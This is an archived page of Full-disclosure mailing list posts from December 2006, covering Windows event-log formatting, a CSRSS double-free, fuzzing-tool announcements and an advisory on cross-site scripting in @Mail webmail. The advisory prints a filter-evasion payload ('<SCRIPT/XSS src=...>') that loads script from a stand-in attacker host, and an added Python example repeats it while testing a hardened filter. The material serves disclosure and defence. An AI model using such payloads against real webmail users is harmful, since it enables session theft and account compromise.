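 * overlapping strcpy(). Source and destination overlap, which the C standard
 * leaves undefined; strcpy() also needs a NUL that a counted string need not
 * carry, and Length is not updated. Kept for comparison, not exercised. */
void strip_prefix_strcpy(counted_string *s) {
    if (s->Length > 4 && memcmp(s->Buffer, "\\??\\", 4) == 0)
        strcpy(s->Buffer, s->Buffer + 4);   /* undefined: overlapping objects */
}

/* Defined-behaviour version: memmove() is specified for overlapping ranges,
 * the byte count comes from Length rather than from a terminator, and Length
 * is updated. Returns 1 if a prefix was removed, 0 otherwise. */
int strip_prefix_memmove(counted_string *s) {
    if (s->Length <= 4 || memcmp(s->Buffer, "\\??\\", 4) != 0) return 0;
    size_t rest = (size_t)s->Length - 4;
    memmove(s->Buffer, s->Buffer + 4, rest);
    s->Length = (unsigned short)rest;
    if (s->MaximumLength > rest) s->Buffer[rest] = '\0';   /* terminate if room */
    return 1;
}

/* Constructed samples: a path with the prefix and one without. */
int demo_prefix_removed(void) {
    char buf[32] = "\\??\\C:\\x.txt";
    counted_string s = { (unsigned short)strlen(buf), (unsigned short)sizeof buf, buf };
    return strip_prefix_memmove(&s) == 1 && s.Length == 8 && strcmp(buf, "C:\\x.txt") == 0;
}
int demo_no_prefix_untouched(void) {
    char buf[32] = "C:\\x.txt";
    counted_string s = { (unsigned short)strlen(buf), (unsigned short)sizeof buf, buf };
    return strip_prefix_memmove(&s) == 0 && s.Length == 8 && strcmp(buf, "C:\\x.txt") == 0;
}

int main(void) {
    printf("prefix removed:      %d\n", demo_prefix_removed());
    printf("no prefix untouched: %d\n", demo_no_prefix_untouched());
    return 0;
}
```

Whether a given strcpy() happens to work on overlapping ranges is an implementation accident, which is why the thread can only say "should be safe"; memmove() removes the question.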



Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Michele Cicciotti
 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

I doubt this. The event logs don't contain the actual formatted string, because 
the template string is localized and only retrieved when the entry is displayed 
- what is logged is just a message id and the string inserts (see documentation 
for EVENTLOGRECORD). FormatMessage (which is used to build the full message to 
display to the user) isn't the culprit, either, because it doesn't operate 
recursively (that would have bizarre consequences, since FormatMessage also 
performs automatic line wrapping and indenting) - to prove it quickly and 
cheaply, make a copy of ntoskrnl.exe as %1.exe and try to run it: the error 
message you get back is prepared with FormatMessage (see kernel32, message 
table, entry 129), and it doesn't exhibit recursion

I think this is just a fairly minor bug/feature of the standard event log 
viewer, and wouldn't affect log analyzers, unless they implement this 
counterintuitive behavior (that was probably coded to support some pathological 
case where a single pass of formatting wasn't enough). But I expect log 
analyzers would rather work with the message source + id than the formatted 
display message, anyway

 Most  services  do  not escape any user-supplied input then constructing
 log  event.

They are not supposed to, in fact that would damage the log. A human being 
might be fooled (for example you could embed newlines and fake fields in 
multi-line messages), but an automatic analysis tool will always see exactly 
the parameters passed




Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Tim


  There  is  interesting  thing  with  event  logging on Windows. The only
  security  aspect  of  it  is  event log record tampering and performance
  degradation,  but  it may become sensitive is some 3rd party software is
  used for automated event log analysis.

Log tampering is a big concern, since it is trivial to change the
meaning of logs without touching the .evt files themselves.

However, there are other security concerns, at least when it comes to
the event viewer.  It downloads DLLs from remote systems when viewing
remote logs, parses the message resources and uses them to determine the
meaning of remote logs.  Anyone played with fuzzing the PE file format?


  The   problem   is   a  kind  of  Format  string  vulnerability  where
  user-supplied  input  is  used  for  event log record. For ReportEvent()
  function  %1,  %2,  etc  have  a  special  meaning and are replaced with
  corresponding  string  from  lpStrings.  
 It looks more like a variable replacement (like $0 $1 ... in bash shell) 
 than a format string issue to me.
 And it seems indeed to be a relevant information disclosure bug.

I have studied the FormatMessage() interface in my attempt to interpret
event logs[1], but I had no idea that the %n elements were replaced
recursively.  That could be significant, since format strings *can* be
included as a modifier for those elements.  See [2] for more details.

3APA3A, have you tried to see if elements like %n!FORMAT! used
recursively will invoke the wsprintf()-like behavior??

cheers,
tim


[1] http://projects.sentinelchicken.org/grokevt/

[2] http://msdn.microsoft.com/library/en-us/debug/base/formatmessage.asp




[Full-disclosure] SQID v0.1 - SQL Injection Digger.

2006-12-21 Thread Metaeye SG
SQL injection digger is a command line program that looks for SQL
injections and common errors in websites. The current version looks for SQL
injections and common errors in website URLs found by performing a
Google search.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org



Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Tim,

--Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]:


T 3APA3A, have you tried to see if elements like %n!FORMAT! used
T recursively will invoke the wsprintf()-like behavior??

Yes, I did. It doesn't work.

-- 
~/ZARAZA
But anyone might think of eggs, heels and bishops. (Lem)


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Michele Cicciotti,

--Thursday, December 21, 2006, 6:20:54 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

> There is interesting thing with event logging on Windows. The only
> security aspect of it is event log record tampering and performance
> degradation, but it may become sensitive if some 3rd party software is
> used for automated event log analysis.

MC I doubt this. The event logs don't contain the actual formatted
MC string, because the template string is localized and only retrieved
MC when the entry is displayed - what is logged is just a message id
MC and the string inserts (see documentation for EVENTLOGRECORD).
MC FormatMessage (which is used to build the full message to display to
MC the user) isn't the culprit, either, because it doesn't operate
MC recursively (that would have bizarre consequences, since

As I wrote, my message is semi-offtopic, because it's more fun than
any security vulnerability here.

Yes, probably this bug only affects event viewer itself. I don't
understand how and why Microsoft achieved this effect in event viewer,
which is, by the way, a security tool, and if it's hard for a different
vendor to make the same mistake. It doesn't look like an Easter egg, but if
FormatMessage does not recurse it needs to be specially coded and it
does nothing except this bug. A bug that needs to be specially coded is a
new funny bug category, isn't it?

-- 
~/ZARAZA
http://www.security.nnov.ru/



[Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [EMAIL PROTECTED] WebMail Cross Site Scripting Vulnerabilitity]

2006-12-21 Thread Netragard Security Advisories

Netragard, L.L.C Advisory
Strategic Reconnaissance Team
http://www.netragard.com -- We make I.T. Safe.


[POSTING NOTICE]
--
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

Netragard Research: http://www.netragard.com/html/recent_research.html





[About Netragard]
--
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
--
Contact : Adriel T. Desautels
Researcher  : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name: @ Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability   : XSS with filter evasion technique.
Effort  : Easy

--
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
--
@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device.


http://www.atmail.com





[Technical Summary]
--
@Mail does not properly sanitize email. While @Mail does prepend
a DEFANGED_ tag to detected HTML tags, it does not properly detect
<SCRIPT/XSS> tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks (XSS) via filter evasion.





[Technical Details]
--
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.





---8<--- SNIP Global.pm line 626 - 635 SNIP ---8<---
my ( $I1I11I11I11I, $I1I111III1II );
$_ = $III1II1II1II->II1II1I11111($I1I1II1II1I11II1);
if (/</) {
    # tag name must be followed by whitespace or '>' to be rewritten
    s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi;
    s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|Unload)/DEFANGED_On$1/gi;
}
# decode decimal and hex character references that appear inside a quoted
# attribute value or a tag, so the tag filter above can see them
if (/[\047<][^\047<\s]*&#x?[1-9][0-9a-f]/i) {
    while ( /[\047<][^\047<\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/ ) {
        $I1I111III1II = chr($1);
        s/&#$1;?/$I1I111III1II/g;
    }
    while ( /[\047<][^\047<\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i ) {
        $I1I111III1II = chr( hex("0$1") );
        s/&#$1;?/$I1I111III1II/gi;
    }
}
---8<--- SNIP Global.pm line 626 - 635 SNIP ---8<---

The above code will replace <SCRIPT> with <DEFANGED_SCRIPT>, but the
security created by the filtering process can be defeated. This is
because most web browsers assume that non-alpha-non-digit characters
are invalid after an HTML keyword and as such they are treated as
white-space. An attacker can use this knowledge to attack @Mail users.

Example:

\s matches any white space character (space and tab, as
well as \n and \r characters). <SCRIPT> is defanged by the
above sanitization however <SCRIPT/XSS> is not.

When <SCRIPT/XSS> hits a web browser it is translated back into
<SCRIPT> and executed by the browser. The /XSS becomes whitespace
to the browser. This is a very common filter evasion technique.


The following code <SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>
will then be executed when rendering an email with @Mail Webmail.

Please note that the email parser will also replace http:// by a <a
href=...>, breaking up our XSS
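An added example, not @Mail's code and not from the advisory, in Python rather than Perl: a port of the Global.pm tag rule quoted above, beside a variant that ends the tag name at any non-alphanumeric character, which is the browser behaviour the advisory describes. The sample messages are constructed and attacker.example is a placeholder host.

```python
"""Added example (not @Mail's code): port of the Global.pm tag rule quoted in
the advisory, next to a delimiter rule that matches what browsers do.
All inputs below are constructed; attacker.example is a placeholder host."""
import re

TAGS = "META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY"
EVENTS = ("Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|"
          "KeyPress|KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|"
          "Move|Reset|Resize|Select|Submit|Unload")

# Port of the page's rule: the tag name must be followed by whitespace or '>'.
# '<SCRIPT/XSS' satisfies neither alternative and is left untouched.
ORIGINAL_TAG_RE = re.compile(r"<(%s)(\s|>)" % TAGS, re.IGNORECASE)

# Hardened rule: the tag name ends at any character that is not a letter or
# digit, so '<SCRIPT/XSS', '<SCRIPT\t' and '<SCRIPT>' are all rewritten.
HARDENED_TAG_RE = re.compile(r"<(%s)(?![A-Za-z0-9])" % TAGS, re.IGNORECASE)

EVENT_RE = re.compile(r"On(%s)" % EVENTS, re.IGNORECASE)


def defang_original(html):
    """Mirror of the two substitutions quoted from Global.pm."""
    html = ORIGINAL_TAG_RE.sub(r"<DEFANGED_\1\2", html)
    return EVENT_RE.sub(r"DEFANGED_On\1", html)


def defang_hardened(html):
    """Same denylist, but with the delimiter rule browsers actually apply."""
    html = HARDENED_TAG_RE.sub(r"<DEFANGED_\1", html)
    return EVENT_RE.sub(r"DEFANGED_On\1", html)


def live_tag_present(html, tag="SCRIPT"):
    """Oracle for 'would a browser still see <tag ...>': '<' plus the tag
    name followed by anything that is not a letter or digit."""
    return re.search(r"<%s(?![A-Za-z0-9])" % tag, html, re.IGNORECASE) is not None


# Constructed messages: the plain tag, the '/XSS' evasion the advisory
# describes, and an event-handler attribute on a tag outside the denylist.
SAMPLES = {
    "plain":   '<SCRIPT src=//attacker.example/xss.js></SCRIPT>',
    "evasion": '<SCRIPT/XSS src=//attacker.example/xss.js></SCRIPT>',
    "handler": '<IMG src=x OnError=alert(1)>',
}


def audit(samples=SAMPLES):
    """For each sample, report whether a live <SCRIPT> survives each filter."""
    return {name: {"original_survives": live_tag_present(defang_original(html)),
                   "hardened_survives": live_tag_present(defang_hardened(html))}
            for name, html in samples.items()}


if __name__ == "__main__":
    for name, result in audit().items():
        print(name, result)
```

The hardened regex closes this particular gap; a denylist of tag names remains a weak control compared with parsing the message into a DOM and allowlisting elements and attributes.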

Re: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page

2006-12-21 Thread Jerome Athias
Gadi Evron wrote:
> On Tue, 12 Dec 2006, Joxean Koret wrote:
>>
>> Wow! That's fun! The so called Word 0 day flaw also affects
>> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
>> with the file:
>>
>
> This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> mode, on a mailing list (fuzzing mailing list).
>
> I am not sure why I got this 10 times now, I thought the days of these
> bounces were over. But I am tired of seeing every full-disclosure
> vulnerability called a 0day anymore.
>
> A 0day, whatever definition you use, is used in the wild before people are
> aware of it.
It makes sense and I totally agree with you.
But the fact is that things change (and not always in the right
direction :-()... due to society, money, the search for popularity...
Please also remind us of the sense of the word "hacker", for instance,
since nowadays it's often used to speak about a bad guy/blackhat/pirate -
I hope you'll agree that it's not the (our) sense.

/JA



Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Michele Cicciotti
> Yes, probably this bug only affects event viewer itself. I don't
> understand how and why Microsoft achieved this effect in event viewer,
> which is, by the way, a security tool, and if it's hard for a different
> vendor to make the same mistake.

For what it's worth, the updated viewer in Windows Vista can show string 
inserts separately, in a list. IIRC its XML export function exports them 
separately, too.




Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Alexander Sotirov
3APA3A wrote:
> Killer{R} assumes the problem is in strcpy(), because it should not be
> used for overlapping buffers, but at least ANSI implementation of strcpy
> from Visual C should be safe in this very situation (copying to lower
> addresses). Maybe the code is different for Windows XP or vulnerability is
> later in code.

We discovered this bug some time ago and were preparing an advisory when it was
publicly disclosed. Since the exploit is already public, here's my analysis of
the vulnerability:

http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

It's a double free bug that leads to arbitrary code execution in the CSRSS 
process.

Alex



Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries

2006-12-21 Thread Nick FitzGerald
Jason Muskat, GCFA, GCUX, de VE3TSJ wrote:

> People, programmers, computers, software, design patterns, systems, and
> infrastructure are constantly changing, often being reinvented. As such,
> they will never be stable.
>
> Concrete of a type is always the same and therefore predictable. One can
> state with certainty that a concrete slab will perform to design. This will
> never be possible in IT.
>
> Many commercially produced software products don't have any warranty. Many
> even state that the software is not warranted for any function or purpose.

That's _because_ software makers argued long and hard for a special 
exemption from most standard producer liability regulations and laws, 
and in many cases also for protection from consumer protection laws.

They made this argument mainly along the lines you opened your comments 
with -- "everything is so complex and forever changing that if we had 
to do proper design, specification and testing we'd never produce 
anything and meeting those normal legal requirements would make 
everything ever so much less innovative and slower and only the very 
largest companies could ever afford to even think about writing 
software."

This -- particularly the "cost will bury us" part -- is _still_ the 
main argument the OSS folk make against any and all suggestions that 
software liability rules should be tightened up.

Thus, as NOT providing such guarantees is legally sanctioned, you 
cannot really use it as an argument supporting the "any old slop we put 
on the disk will do" approach we have suffered from for far too long.

> ... The fact that the software does something that one thinks it should do
> is incidental. 

Yep.

Given you seem so strongly in favour of the current "couldn't really 
give a shit" view of software quality, you'll be rushing to sign my 
petition requiring all university and other educational courses in 
"computer science" to change their names to "computer art & craft" or 
"computer guesswork" or something similarly accurately describing their 
professional endorsement of hit-and-miss, "slop it all in a bucket then 
pour it through a compiler we especially dumbed down to not give a rat's 
arse about quality" approach, and for "software engineering" courses to 
similarly remove their abusive use of the term "engineering"...


Regards,

Nick FitzGerald



Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Pukhraj Singh
Holy mackerel! Instances of this bug date back to 1999!

http://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5aff

--Pukhraj

On 12/21/06, Alexander Sotirov [EMAIL PROTECTED] wrote:
> 3APA3A wrote:
>> Killer{R} assumes the problem is in strcpy(), because it should not be
>> used for overlapping buffers, but at least ANSI implementation of strcpy
>> from Visual C should be safe in this very situation (copying to lower
>> addresses). Maybe the code is different for Windows XP or vulnerability is
>> later in code.
>
> We discovered this bug some time ago and were preparing an advisory when it
> was publicly disclosed. Since the exploit is already public, here's my
> analysis of the vulnerability:
>
> http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
>
> It's a double free bug that leads to arbitrary code execution in the CSRSS
> process.
>
> Alex





Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Valdis . Kletnieks
On Thu, 21 Dec 2006 23:15:41 GMT, Aaron Gray said:

> Sorry a dog not lions!

Of course, even the most bad-ass canine can be taken down by sufficient
strength:

Herakles asked Plouton [Haides] for Kerberos, and was told to take the hound if
he could overpower it without using any of the weapons he had brought with him.
He found Kerberos at the gates of Akheron, and there, pressed inside his armour
and totally covered by the lion's skin, he threw his arms round its head and
hung on, despite bites from the serpent-tail, until he convinced the beast with
his choke-hold. Then, with it in tow, he made his ascent through Troizen. After
showing Kerberos to Eurystheus, he took it back to Haides' realm. -
Apollodorus, The Library 2.125

or cleverness:

Huge Cerberus, monstrously couched in a cave confronting them, made the whole
region echo with this three-throated barking. The Sibyl, seeing the snakes
bristling upon his neck now, threw him for bait a cake of honey and wheat
infused with sedative drugs. The creature, crazy with hunger, opened its three
mouths, gobbled the bait; then its huge body relaxed and lay, sprawled out on
the ground, the whole length of its cave kennel. Aeneas, passing its entrance,
the watch-dog neutralized, strode rapidly from the bank of that river [Styx] of
no return. - Virgil, Aeneid 6.417

http://www.theoi.com/Ther/KuonKerberos.html

There's a security-related moral somewhere in there. :)



Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread Michele Cicciotti
> Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads 
through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which 
causes a DoS as no threads are available to serve kernel-mode requests from 
win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in 
my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated 
thread is used for such notifications, not just any thread, any time. Easily 
verifiable with local net sends and Spy++. It wasn't a bug either, more like 
a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in 
a worker thread) - not at all like this double-free.




Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Jim Popovitch
On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote:
> Windows is very very holy.

Don't you mean hole'y?  ;-)

-Jim P.



Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Jim Popovitch
On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote:
> On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote:
>> Windows is very very holy.
>
> Don't you mean hole'y?  ;-)

OK, why do I get bounce messages from 

  [EMAIL PROTECTED] (sub: Posting error: Secure Computing)

  [EMAIL PROTECTED] (sub: Blogger post failed)

Seems to me that if you are smart enough to fwd email to a third place,
you would be smart enough to have it accept from everyone (not just
yourself).

-Jim P.



[Full-disclosure] [TOOL] untidy - XML Fuzzer

2006-12-21 Thread Andres Riancho
List,

   I'm glad to release a beta version of untidy; untidy is a general
purpose XML fuzzer. It takes a string representation of an XML document as
input and generates a set of modified, potentially invalid, XML documents
based on the input. It's released under GPL v2 and written in Python.

   http://untidy.sourceforge.net/

Cheers,

-- 
Andres Riancho



Re: [Full-disclosure] Windows is very holy

2006-12-21 Thread Michele Cicciotti
>> Windows is very very holy.
> Don't you mean hole'y?  ;-)

Time for a gratuitous Sluggy Freelance reference!

http://sluggy.com/daily.php?date=040208
